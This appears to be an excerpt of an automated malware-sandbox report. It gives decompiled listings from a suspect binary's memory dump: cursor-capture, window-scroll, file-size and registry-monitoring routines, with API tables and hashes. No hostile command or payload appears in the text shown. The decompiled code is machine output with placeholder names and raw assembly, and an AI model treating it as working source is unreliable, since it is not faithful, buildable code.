                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                                                                            				intOrPtr _t123;
                                                                                                                                                                                                                            				intOrPtr _t124;
                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = __fp0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t88 = __edx;
                                                                                                                                                                                                                            				_t124 = __eax;
                                                                                                                                                                                                                            				 *0x49eb34 = __eax;
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x439471);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t134;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				 *0x49eb3c = 0;
                                                                                                                                                                                                                            				_t135 =  *((char*)(__eax + 0x9b));
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x9b)) != 0) {
                                                                                                                                                                                                                            					E00403DE8(__eax, __eflags);
                                                                                                                                                                                                                            					__eflags =  *0x49eb34;
                                                                                                                                                                                                                            					if( *0x49eb34 != 0) {
                                                                                                                                                                                                                            						__eflags = _v12;
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							_v12 = E00438690(1, _t124);
                                                                                                                                                                                                                            							 *0x49eb3c = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                                                                                                                                                                                            						_t105 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                                                                                                                                                                                            						__eflags = _t54;
                                                                                                                                                                                                                            						if(_t54 == 0) {
                                                                                                                                                                                                                            							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								E004197DC(0,  &_v36, 0, _t124, _t129);
                                                                                                                                                                                                                            								E0043AA94(_t129,  &_v28,  &_v36);
                                                                                                                                                                                                                            								_t60 = _v12;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                            								_t130 = _v12;
                                                                                                                                                                                                                            								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                                                                                                                                                                                                            								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                                                                                                                                                                                            								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                                                                                                                                                                                                            								_t65 = _v12;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t116 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            							_t71 = E00403D78(_t129, _t116);
                                                                                                                                                                                                                            							__eflags = _t71;
                                                                                                                                                                                                                            							if(_t71 != 0) {
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							GetCursorPos( &_v20);
                                                                                                                                                                                                                            							_t74 = _v12;
                                                                                                                                                                                                                            							 *(_t74 + 0x44) = _v20.x;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							GetWindowRect(E00441704(_t128), _v12 + 0x44);
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                            							E0043915C(_v12, _v8, _t88, _t133, _t137);
                                                                                                                                                                                                                            							_pop(_t115);
                                                                                                                                                                                                                            							 *[fs:eax] = _t115;
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t120);
                                                                                                                                                                                                                            					 *[fs:eax] = _t120;
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403DE8(__eax, _t135);
                                                                                                                                                                                                                            				if( *0x49eb34 != 0) {
                                                                                                                                                                                                                            					__eflags = _v12;
                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                            						_v12 = E00438578(_t124, 1);
                                                                                                                                                                                                                            						 *0x49eb3c = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t123);
                                                                                                                                                                                                                            				 *[fs:eax] = _t123;
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                            0x004393cc
                                                                                                                                                                                                                            0x004393f9
                                                                                                                                                                                                                            0x004393fe
                                                                                                                                                                                                                            0x00439400
                                                                                                                                                                                                                            0x0043940d
                                                                                                                                                                                                                            0x00439412
                                                                                                                                                                                                                            0x00439418
                                                                                                                                                                                                                            0x0043941e
                                                                                                                                                                                                                            0x00439421
                                                                                                                                                                                                                            0x00439421
                                                                                                                                                                                                                            0x0043942a
                                                                                                                                                                                                                            0x00439433
                                                                                                                                                                                                                            0x00439439
                                                                                                                                                                                                                            0x0043943e
                                                                                                                                                                                                                            0x00439444
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x004393d0
                                                                                                                                                                                                                            0x004393d6
                                                                                                                                                                                                                            0x004393db
                                                                                                                                                                                                                            0x004393dd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393e3
                                                                                                                                                                                                                            0x004393e8
                                                                                                                                                                                                                            0x004393ee
                                                                                                                                                                                                                            0x004393f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393a9
                                                                                                                                                                                                                            0x004393b8
                                                                                                                                                                                                                            0x0043944d
                                                                                                                                                                                                                            0x00439456
                                                                                                                                                                                                                            0x00439457
                                                                                                                                                                                                                            0x00439458
                                                                                                                                                                                                                            0x00439459
                                                                                                                                                                                                                            0x0043945a
                                                                                                                                                                                                                            0x00439462
                                                                                                                                                                                                                            0x00439469
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x004393a7
                                                                                                                                                                                                                            0x00439369
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x0043930e
                                                                                                                                                                                                                            0x0043931a
                                                                                                                                                                                                                            0x00439329
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x00439341
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x0043931e
                                                                                                                                                                                                                            0x00439321
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: \`C$tC
                                                                                                                                                                                                                            • API String ID: 0-3452953066
                                                                                                                                                                                                                            • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                                                                                                                                                                                            • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                            				long _t58;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				long long _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t87 = __fp0;
                                                                                                                                                                                                                            				_t80 = _t79 + 0xfffffff8;
                                                                                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                            				_t77 = __eax;
                                                                                                                                                                                                                            				 *0x49eb38 = __eax;
                                                                                                                                                                                                                            				_t24 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                                                                                                                                                                                            				GetCursorPos(0x49eb44);
                                                                                                                                                                                                                            				_t26 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				_t58 = 0x49eb44->x; // 0x0
                                                                                                                                                                                                                            				 *(_t26 + 0xc) = _t58;
                                                                                                                                                                                                                            				_t59 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                                                                                                                                                                                                            				 *0x49eb4c = GetCursor();
                                                                                                                                                                                                                            				_t28 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *0x49eb40 = E00438388(_t28);
                                                                                                                                                                                                                            				 *0x49eb50 = _t70;
                                                                                                                                                                                                                            				_t60 =  *0x4360a0; // 0x4360ec
                                                                                                                                                                                                                            				if(E00403D78(_t77, _t60) == 0) {
                                                                                                                                                                                                                            					__eflags = _t45;
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						 *0x49eb54 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t65 = _t77;
                                                                                                                                                                                                                            					_t4 = _t65 + 0x44; // 0x44
                                                                                                                                                                                                                            					_t41 = _t4;
                                                                                                                                                                                                                            					_t49 =  *_t41;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                                                                                                                                                                                                            						asm("fild dword [esp]");
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                                                                                                                                                                                                            						asm("fild dword [esp+0x4]");
                                                                                                                                                                                                                            						asm("fdivp st1, st0");
                                                                                                                                                                                                                            						 *((long long*)(_t65 + 0x20)) = __fp0;
                                                                                                                                                                                                                            						asm("wait");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t66 =  *((intOrPtr*)(_t41 + 4));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t53 = _t77;
                                                                                                                                                                                                                            						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                                                                                                                                                                                                            						asm("fild dword [esp]");
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                                                                                                                                                                                                            						asm("fild dword [esp+0x4]");
                                                                                                                                                                                                                            						asm("fdivp st1, st0");
                                                                                                                                                                                                                            						 *((long long*)(_t53 + 0x28)) = _t87;
                                                                                                                                                                                                                            						asm("wait");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                            						 *0x49eb54 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 2;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t77 + 0x30))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t32 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
                                                                                                                                                                                                                            				_t85 =  *0x49eb58;
                                                                                                                                                                                                                            				if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            					_t37 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            					_t38 = GetDesktopWindow();
                                                                                                                                                                                                                            					_t39 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            					E00443038(_t39, _t38, _t85, _t37);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t35 = E00403BBC(1);
                                                                                                                                                                                                                            				 *0x49eb60 = _t35;
                                                                                                                                                                                                                            				if( *0x49eb54 != 0) {
                                                                                                                                                                                                                            					_t35 = E00438E8C(0x49eb44, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t35;
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                                                                                                                                                                                            • GetCursor.USER32(0049EB44), ref: 00439199
                                                                                                                                                                                                                              • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043928B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 669539147-1847193361
                                                                                                                                                                                                                            • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                                                                                                                                                                                            • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				char _t23;
                                                                                                                                                                                                                            				struct HWND__* _t42;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            				intOrPtr* _t59;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                                                                                                                                                                                            				 *_t59 = __edx;
                                                                                                                                                                                                                            				_t54 = __eax;
                                                                                                                                                                                                                            				_t42 =  *(__eax + 0x180);
                                                                                                                                                                                                                            				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                                                                                                                                                                                            					_t23 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t23 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t59 + 8)) = _t23;
                                                                                                                                                                                                                            				if( *((char*)(_t59 + 8)) != 0) {
                                                                                                                                                                                                                            					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t56 = E0043E434(_t54) - 1;
                                                                                                                                                                                                                            				if(_t56 < 0) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					return E0043DFC4();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t57 = _t56 + 1;
                                                                                                                                                                                                                            					_t58 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t43 = E0043E3F8(_t54, _t58);
                                                                                                                                                                                                                            						_t47 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *((char*)(_t59 + 8)) == 0) {
                                                                                                                                                                                                                            								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t58 = _t58 + 1;
                                                                                                                                                                                                                            						_t57 = _t57 - 1;
                                                                                                                                                                                                                            					} while (_t57 != 0);
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004412D7
                                                                                                                                                                                                                            • ScrollWindow.USER32 ref: 00441306
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ScrollVisible
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 4127837035-1085749316
                                                                                                                                                                                                                            • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                            • String ID: lI
                                                                                                                                                                                                                            • API String ID: 1378416451-2224401619
                                                                                                                                                                                                                            • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                                                                                                                                                                                            • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00494694(void* __eax) {
                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x48)) = 5;
                                                                                                                                                                                                                            				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
                                                                                                                                                                                                                            				asm("cmc");
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
                                                                                                                                                                                                                            				if(_t18 != 0) {
                                                                                                                                                                                                                            					_t20 = E0040D144("Can not start monitoring", 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            					return _t20;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Can not start monitoring, xrefs: 004946E3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateEvent$ChangeNotifyValue
                                                                                                                                                                                                                            • String ID: Can not start monitoring
                                                                                                                                                                                                                            • API String ID: 2233126570-3835272546
                                                                                                                                                                                                                            • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                                                                                                                                                                                            • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
